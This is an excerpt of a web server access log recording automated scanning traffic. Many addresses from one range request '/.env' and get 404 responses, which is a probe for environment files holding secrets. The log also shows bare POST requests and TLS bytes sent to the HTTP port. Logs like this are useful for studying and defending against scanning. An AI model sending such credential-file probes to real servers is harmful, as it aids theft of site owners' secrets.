34.78.68.58 - - [02/Jun/2024:04:49:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.2"
45.154.138.58 - - [02/Jun/2024:04:49:22 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
45.154.138.78 - - [02/Jun/2024:04:49:22 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
45.154.138.69 - - [02/Jun/2024:04:49:22 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
45.154.138.92 - - [02/Jun/2024:04:49:23 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
45.154.138.71 - - [02/Jun/2024:04:49:23 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
45.154.138.99 - - [02/Jun/2024:04:49:23 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
45.154.138.93 - - [02/Jun/2024:04:49:23 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
45.154.138.74 - - [02/Jun/2024:04:49:23 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
45.154.138.61 - - [02/Jun/2024:04:49:23 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
45.154.138.82 - - [02/Jun/2024:04:49:23 +0200] "GET /.env HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
45.154.138.73 - - [02/Jun/2024:04:49:23 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
45.154.138.88 - - [02/Jun/2024:04:49:23 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
45.154.138.95 - - [02/Jun/2024:04:49:24 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
45.154.138.77 - - [02/Jun/2024:04:49:24 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
45.154.138.56 - - [02/Jun/2024:04:49:24 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
45.154.138.83 - - [02/Jun/2024:04:49:24 +0200] "POST / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
71.6.134.232 - - [02/Jun/2024:04:49:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
34.78.68.58 - - [02/Jun/2024:04:50:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.2"
64.62.197.76 - - [02/Jun/2024:04:50:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
184.105.247.254 - - [02/Jun/2024:04:50:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.129 - - [02/Jun/2024:04:51:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
71.6.134.232 - - [02/Jun/2024:04:51:59 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
